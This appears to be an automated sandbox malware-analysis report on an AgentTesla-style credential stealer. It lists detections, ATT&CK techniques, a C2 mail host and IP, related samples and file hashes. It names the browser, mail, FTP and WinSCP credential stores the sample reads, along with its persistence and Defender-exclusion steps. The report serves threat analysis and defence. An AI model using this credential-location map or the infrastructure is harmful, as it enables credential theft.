                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                        Stealing of Sensitive Information

                        Source: Yara matchFile source: 10.2.NxmtwwVGOtEdjd.exe.45296a0.4.unpack, type: UNPACKEDPE
                        Source: Yara match, File source: 10.2.NxmtwwVGOtEdjd.exe.4500680.3.unpack, type: UNPACKEDPE
                        Source: Yara match, File source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack, type: UNPACKEDPE
                        Source: Yara match, File source: 0.2.LisectAVT_2403002A_16.exe.41d8730.5.unpack, type: UNPACKEDPE
                        Source: Yara match, File source: 10.2.NxmtwwVGOtEdjd.exe.45296a0.4.raw.unpack, type: UNPACKEDPE
                        Source: Yara match, File source: 10.2.NxmtwwVGOtEdjd.exe.4500680.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara match, File source: 0.2.LisectAVT_2403002A_16.exe.41d8730.5.raw.unpack, type: UNPACKEDPE
                        Source: Yara match, File source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.raw.unpack, type: UNPACKEDPE
                        Source: Yara match, File source: 00000009.00000002.2898350883.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match, File source: 0000000A.00000002.1787617220.0000000004500000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match, File source: 00000000.00000002.1723431532.00000000041AF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match, File source: dump.pcap, type: PCAP
                        Source: Yara match, File source: 0000000F.00000002.2902484873.0000000002D3A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match, File source: 00000009.00000002.2901886951.0000000002ECA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match, File source: 00000009.00000002.2901886951.0000000002E71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match, File source: 0000000F.00000002.2902484873.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match, File source: Process Memory Space: LisectAVT_2403002A_16.exe PID: 7544, type: MEMORYSTR
                        Source: Yara match, File source: Process Memory Space: NxmtwwVGOtEdjd.exe PID: 7972, type: MEMORYSTR
                        Source: Yara match, File source: decrypted.memstr, type: MEMORYSTR
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe, Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe, Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe, File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe, File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe, File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe, File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe, File opened: C:\FTP Navigator\Ftplist.txt
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe, File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe, Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe, Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe, File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe, Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe, Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                        Source: Yara match, File source: 00000009.00000002.2901886951.0000000002E71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match, File source: 0000000F.00000002.2902484873.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match, File source: Process Memory Space: LisectAVT_2403002A_16.exe PID: 7544, type: MEMORYSTR
                        Source: Yara match, File source: Process Memory Space: NxmtwwVGOtEdjd.exe PID: 7972, type: MEMORYSTR
                        Source: Yara match, File source: decrypted.memstr, type: MEMORYSTR

                        Remote Access Functionality

                        Source: Yara match, File source: 10.2.NxmtwwVGOtEdjd.exe.45296a0.4.unpack, type: UNPACKEDPE
                        Source: Yara match, File source: 10.2.NxmtwwVGOtEdjd.exe.4500680.3.unpack, type: UNPACKEDPE
                        Source: Yara match, File source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpack, type: UNPACKEDPE
                        Source: Yara match, File source: 0.2.LisectAVT_2403002A_16.exe.41d8730.5.unpack, type: UNPACKEDPE
                        Source: Yara match, File source: 10.2.NxmtwwVGOtEdjd.exe.45296a0.4.raw.unpack, type: UNPACKEDPE
                        Source: Yara match, File source: 10.2.NxmtwwVGOtEdjd.exe.4500680.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara match, File source: 0.2.LisectAVT_2403002A_16.exe.41d8730.5.raw.unpack, type: UNPACKEDPE
                        Source: Yara match, File source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.raw.unpack, type: UNPACKEDPE
                        Source: Yara match, File source: 00000009.00000002.2898350883.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match, File source: 0000000A.00000002.1787617220.0000000004500000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match, File source: 00000000.00000002.1723431532.00000000041AF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match, File source: dump.pcap, type: PCAP
                        Source: Yara match, File source: 0000000F.00000002.2902484873.0000000002D3A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match, File source: 00000009.00000002.2901886951.0000000002ECA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match, File source: 00000009.00000002.2901886951.0000000002E71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match, File source: 0000000F.00000002.2902484873.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match, File source: Process Memory Space: LisectAVT_2403002A_16.exe PID: 7544, type: MEMORYSTR
                        Source: Yara match, File source: Process Memory Space: NxmtwwVGOtEdjd.exe PID: 7972, type: MEMORYSTR
                        Source: Yara match, File source: decrypted.memstr, type: MEMORYSTR
                        MITRE ATT&CK Matrix (interactive matrix in the original report; tactic columns: Reconnaissance, Resource Development, Initial Access, Execution, Persistence, Privilege Escalation, Defense Evasion, Credential Access, Discovery, Lateral Movement, Collection, Command and Control, Exfiltration, Impact). Techniques the matrix marks as matched for this sample, grouped by tactic:
                        • Execution: Windows Management Instrumentation, Scheduled Task/Job
                        • Persistence: Scheduled Task/Job, DLL Side-Loading
                        • Privilege Escalation: Process Injection, Scheduled Task/Job, DLL Side-Loading
                        • Defense Evasion: Masquerading, Disable or Modify Tools, Virtualization/Sandbox Evasion, Process Injection, Deobfuscate/Decode Files or Information, Obfuscated Files or Information, Software Packing, Timestomp, DLL Side-Loading
                        • Credential Access: OS Credential Dumping, Credentials in Registry
                        • Discovery: Security Software Discovery, Process Discovery, Virtualization/Sandbox Evasion, Application Window Discovery, File and Directory Discovery, System Information Discovery
                        • Collection: Email Collection, Archive Collected Data, Data from Local System
                        • Command and Control: Encrypted Channel, Non-Standard Port, Non-Application Layer Protocol, Application Layer Protocol
                        No techniques are marked under Reconnaissance, Resource Development, Initial Access, Lateral Movement, Exfiltration or Impact.

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet
                        Behavior Graph (rendered as an image in the original report; node and edge labels recovered from the graph text)
                        Behavior Graph ID: 1482478, Sample: LisectAVT_2403002A_16.exe, Startdate: 25/07/2024, Architecture: WINDOWS, Score: 100
                        Top-level DNS/IP nodes: mail.mbarieservicesltd.com; 171.39.242.20.in-addr.arpa
                        Top-level signatures: Found malware configuration; Antivirus / Scanner detection for submitted sample; Sigma detected: Scheduled temp file as task from temp location; 7 other signatures
                        • LisectAVT_2403002A_16.exe 7, started
                          • Dropped: C:\Users\user\AppData\...\NxmtwwVGOtEdjd.exe (PE32); C:\...\NxmtwwVGOtEdjd.exe:Zone.Identifier (ASCII); C:\Users\user\AppData\Local\...\tmpB5CB.tmp (XML); C:\Users\...\LisectAVT_2403002A_16.exe.log (ASCII)
                          • Signatures: Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines); Uses schtasks.exe or at.exe to add and modify task schedules; Adds a directory exclusion to Windows Defender
                          • LisectAVT_2403002A_16.exe 2, started; connects to mail.mbarieservicesltd.com 199.79.62.115, ports 49735, 49736, 587, PUBLIC-DOMAIN-REGISTRYUS, United States
                          • powershell.exe 22, started; signature: Loading BitLocker PowerShell Module; children: conhost.exe, WmiPrvSE.exe
                          • powershell.exe 23, started; child: conhost.exe
                          • 2 other processes; child: conhost.exe
                        • NxmtwwVGOtEdjd.exe 5, started
                          • Signatures: Antivirus detection for dropped file; Machine Learning detection for dropped file; Injects a PE file into a foreign processes
                          • NxmtwwVGOtEdjd.exe, started; signatures: Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc); Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal ftp login credentials; Tries to harvest and steal browser information (history, passwords, etc)
                          • schtasks.exe, started; child: conhost.exe
                          • NxmtwwVGOtEdjd.exe, started

                        Source | Detection | Scanner | Label
                        LisectAVT_2403002A_16.exe | 100% | Avira | TR/Kryptik.mzsma
                        LisectAVT_2403002A_16.exe | 100% | Joe Sandbox ML | -
                        Source | Detection | Scanner | Label
                        C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe | 100% | Avira | TR/Kryptik.mzsma
                        C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe | 100% | Joe Sandbox ML | -
                        No Antivirus matches
                        No Antivirus matches
                        Source | Detection | Scanner | Label
                        http://www.apache.org/licenses/LICENSE-2.0 | 0% | URL Reputation | safe
                        http://www.fontbureau.com | 0% | URL Reputation | safe
                        http://www.fontbureau.com/designersG | 0% | URL Reputation | safe
                        http://www.fontbureau.com/designers/? | 0% | URL Reputation | safe
                        http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe
                        http://www.fontbureau.com/designers? | 0% | URL Reputation | safe
                        http://www.tiro.com | 0% | URL Reputation | safe
                        http://www.fontbureau.com/designers | 0% | URL Reputation | safe
                        http://www.goodfont.co.kr | 0% | URL Reputation | safe
                        http://www.carterandcone.coml | 0% | URL Reputation | safe
                        http://www.sajatypeworks.com | 0% | URL Reputation | safe
                        http://www.typography.netD | 0% | URL Reputation | safe
                        http://www.fontbureau.com/designers/cabarga.htmlN | 0% | URL Reputation | safe
                        http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe
                        http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe
                        http://www.founder.com.cn/cn | 0% | URL Reputation | safe
                        http://www.fontbureau.com/designers/frere-user.html | 0% | URL Reputation | safe
                        http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe
                        http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe
                        http://www.fontbureau.com/designers8 | 0% | URL Reputation | safe
                        http://www.fonts.com | 0% | URL Reputation | safe
                        http://www.sandoll.co.kr | 0% | URL Reputation | safe
                        http://www.urwpp.deDPlease | 0% | URL Reputation | safe
                        http://www.zhongyicts.com.cn | 0% | URL Reputation | safe
                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
                        http://www.sakkal.com | 0% | URL Reputation | safe
                        http://mail.mbarieservicesltd.com | 0% | Avira URL Cloud | safe
                        Name | IP | Active | Malicious | Antivirus Detection | Reputation
                        mail.mbarieservicesltd.com | 199.79.62.115 | true | true | - | unknown
                        171.39.242.20.in-addr.arpa | unknown | unknown | false | - | unknown
                            Name | Source | Malicious | Antivirus Detection | Reputation
                            http://www.apache.org/licenses/LICENSE-2.0 | LisectAVT_2403002A_16.exe, 00000000.00000002.1726982269.0000000007062000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                            http://www.fontbureau.com | LisectAVT_2403002A_16.exe, 00000000.00000002.1726982269.0000000007062000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                            http://www.fontbureau.com/designersG | LisectAVT_2403002A_16.exe, 00000000.00000002.1726982269.0000000007062000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                            http://www.fontbureau.com/designers/? | LisectAVT_2403002A_16.exe, 00000000.00000002.1726982269.0000000007062000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                            http://www.founder.com.cn/cn/bThe | LisectAVT_2403002A_16.exe, 00000000.00000002.1726982269.0000000007062000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                            http://www.fontbureau.com/designers? | LisectAVT_2403002A_16.exe, 00000000.00000002.1726982269.0000000007062000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                            http://www.tiro.com | LisectAVT_2403002A_16.exe, 00000000.00000002.1726982269.0000000007062000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                            http://www.fontbureau.com/designers | LisectAVT_2403002A_16.exe, 00000000.00000002.1726982269.0000000007062000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                            http://www.goodfont.co.kr | LisectAVT_2403002A_16.exe, 00000000.00000002.1726982269.0000000007062000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                            http://www.carterandcone.coml | LisectAVT_2403002A_16.exe, 00000000.00000002.1726982269.0000000007062000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                            http://www.sajatypeworks.com | LisectAVT_2403002A_16.exe, 00000000.00000002.1726982269.0000000007062000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                            http://www.typography.netD | LisectAVT_2403002A_16.exe, 00000000.00000002.1726982269.0000000007062000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                            http://www.fontbureau.com/designers/cabarga.htmlN | LisectAVT_2403002A_16.exe, 00000000.00000002.1726982269.0000000007062000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                            http://www.founder.com.cn/cn/cThe | LisectAVT_2403002A_16.exe, 00000000.00000002.1726982269.0000000007062000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                            http://www.galapagosdesign.com/staff/dennis.htm | LisectAVT_2403002A_16.exe, 00000000.00000002.1726982269.0000000007062000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                            http://www.founder.com.cn/cn | LisectAVT_2403002A_16.exe, 00000000.00000002.1726982269.0000000007062000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                            http://www.fontbureau.com/designers/frere-user.html | LisectAVT_2403002A_16.exe, 00000000.00000002.1726982269.0000000007062000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                            http://www.jiyu-kobo.co.jp/ | LisectAVT_2403002A_16.exe, 00000000.00000002.1726982269.0000000007062000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                            http://www.galapagosdesign.com/DPlease | LisectAVT_2403002A_16.exe, 00000000.00000002.1726982269.0000000007062000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                            http://www.fontbureau.com/designers8 | LisectAVT_2403002A_16.exe, 00000000.00000002.1726982269.0000000007062000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                            http://www.fonts.com | LisectAVT_2403002A_16.exe, 00000000.00000002.1726982269.0000000007062000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                            http://www.sandoll.co.kr | LisectAVT_2403002A_16.exe, 00000000.00000002.1726982269.0000000007062000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                            http://www.urwpp.deDPlease | LisectAVT_2403002A_16.exe, 00000000.00000002.1726982269.0000000007062000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                            http://www.zhongyicts.com.cn | LisectAVT_2403002A_16.exe, 00000000.00000002.1726982269.0000000007062000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | LisectAVT_2403002A_16.exe, 00000000.00000002.1722615685.0000000002EF3000.00000004.00000800.00020000.00000000.sdmp, NxmtwwVGOtEdjd.exe, 0000000A.00000002.1786665418.000000000323E000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                            http://www.sakkal.com | LisectAVT_2403002A_16.exe, 00000000.00000002.1726399605.0000000005990000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002A_16.exe, 00000000.00000002.1726982269.0000000007062000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                            http://mail.mbarieservicesltd.com | LisectAVT_2403002A_16.exe, 00000009.00000002.2901886951.0000000002ECA000.00000004.00000800.00020000.00000000.sdmp, NxmtwwVGOtEdjd.exe, 0000000F.00000002.2902484873.0000000002D3A000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                            IP | Domain | Country | ASN | ASN Name | Malicious
                            199.79.62.115 | mail.mbarieservicesltd.com | United States | 394695 | PUBLIC-DOMAIN-REGISTRYUS | true
                            Joe Sandbox version:40.0.0 Tourmaline
                            Analysis ID:1482478
                            Start date and time:2024-07-25 23:34:26 +02:00
                            Joe Sandbox product:CloudBasic
                            Overall analysis duration:0h 7m 51s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                            Number of new started processes analysed:20
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Sample name:LisectAVT_2403002A_16.exe
                            Detection:MAL
                            Classification:mal100.troj.spyw.evad.winEXE@23/15@2/1
                            EGA Information:
                            • Successful, ratio: 100%
                            HCA Information:
                            • Successful, ratio: 100%
                            • Number of executed functions: 122
                            • Number of non-executed functions: 22
                            Cookbook Comments:
                            • Found application associated with file extension: .exe
                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                            • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                            • Not all processes were analyzed, report is missing behavior information
                            • Report size exceeded maximum capacity and may have missing behavior information.
                            • Report size getting too big, too many NtCreateKey calls found.
                            • Report size getting too big, too many NtOpenKeyEx calls found.
                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                            • Report size getting too big, too many NtQueryValueKey calls found.
                            • VT rate limit hit for: LisectAVT_2403002A_16.exe
                            Time | Type | Description
                            17:35:16 | API Interceptor | 22x Sleep call for process: LisectAVT_2403002A_16.exe modified
                            17:35:19 | API Interceptor | 55x Sleep call for process: powershell.exe modified
                            17:35:24 | API Interceptor | 17x Sleep call for process: NxmtwwVGOtEdjd.exe modified
                            22:35:20 | Task Scheduler | Run new task: NxmtwwVGOtEdjd path: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe
                            Match | Associated Sample Name / URL | Detection | Threat Name | Context
                            199.79.62.115 | SQ112613x2614763.exe | malicious | AgentTesla, PureLog Stealer | -
                            199.79.62.115 | Quote ZBR223378.exe | malicious | AgentTesla | -
                            199.79.62.115 | PO-07172484.exe | malicious | AgentTesla | -
                            199.79.62.115 | PURCHASE ORDER- 6300-2024.exe | malicious | AgentTesla | -
                            199.79.62.115 | SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.30254.8280.exe | malicious | AgentTesla | -
                            199.79.62.115 | PURCHASE ORDER-6333-2024.exe | malicious | AgentTesla | -
                            199.79.62.115 | SecuriteInfo.com.Win32.PWSX-gen.21784.812.exe | malicious | AgentTesla | -
                            199.79.62.115 | Quotation - 00645.exe | malicious | AgentTesla | -
                            199.79.62.115 | PRICE REQUEST-717-26072023.exe | malicious | AgentTesla | -
                            199.79.62.115 | PO82107048.exe | malicious | AgentTesla | -
                            Match | Associated Sample Name / URL | Detection | Threat Name | Context
                            mail.mbarieservicesltd.com | SQ112613x2614763.exe | malicious | AgentTesla, PureLog Stealer | 199.79.62.115
                            Match | Associated Sample Name / URL | Detection | Threat Name | Context
                            PUBLIC-DOMAIN-REGISTRYUS | LisectAVT_2403002A_52.exe | malicious | AgentTesla | 208.91.198.143
                            PUBLIC-DOMAIN-REGISTRYUS | SWIFT COPY.exe | malicious | AgentTesla | 208.91.199.224
                            PUBLIC-DOMAIN-REGISTRYUS | LisectAVT_2403002B_290.exe | malicious | Bdaejec | 74.119.239.234
                            PUBLIC-DOMAIN-REGISTRYUS | LisectAVT_2403002B_465.exe | malicious | AgentTesla | 208.91.199.223
                            PUBLIC-DOMAIN-REGISTRYUS | jRlq1fSUW5.exe | malicious | AgentTesla | 208.91.199.225
                            PUBLIC-DOMAIN-REGISTRYUS | SecuriteInfo.com.Win32.PWSX-gen.14778.18726.exe | malicious | AgentTesla | 208.91.198.143
                            PUBLIC-DOMAIN-REGISTRYUS | bJrO2iUerN.elf | malicious | Unknown | 204.11.58.71
                            PUBLIC-DOMAIN-REGISTRYUS | PO#1164031.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 208.91.198.24
                            PUBLIC-DOMAIN-REGISTRYUS | 5RQ24SOW EPIRB_TOTAL Marine Services Ltd.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 208.91.198.24
                            PUBLIC-DOMAIN-REGISTRYUS | LCWGT83qLa.exe | malicious | AgentTesla | 208.91.199.223
                                                No context
                                                No context
                                                Process:C:\Users\user\Desktop\LisectAVT_2403002A_16.exe
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):1216
                                                Entropy (8bit):5.34331486778365
                                                Encrypted:false
                                                SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                Malicious:true
                                                Reputation:high, very likely benign file
                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                Process:C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):1216
                                                Entropy (8bit):5.34331486778365
                                                Encrypted:false
                                                SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                Malicious:false
                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):2232
                                                Entropy (8bit):5.379552885213346
                                                Encrypted:false
                                                SSDEEP:48:fWSU4xympjgZ9tz4RIoUl8NPZHUl7u1iMuge//ZMRvUyus:fLHxvCZfIfSKRHmOugras
                                                MD5:536673CFEEBA235304073B32A6519556
                                                SHA1:31B610549B437B8290C8B20809704C1118CCC457
                                                SHA-256:E7BBD1CC511FA56E4A5ABD9403A0A40A9B789CA77B12418A28BFC34FB96E46BC
                                                SHA-512:100211350FFCD4CC63BAA55B75FAAFAEA3524F2E58142883E3C40E63990264D57F4D13536ADC06D2342270CE48C9000D9EA1E81BB045FB9A1EBADEEB1D963D13
                                                Malicious:false
                                                Preview:@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
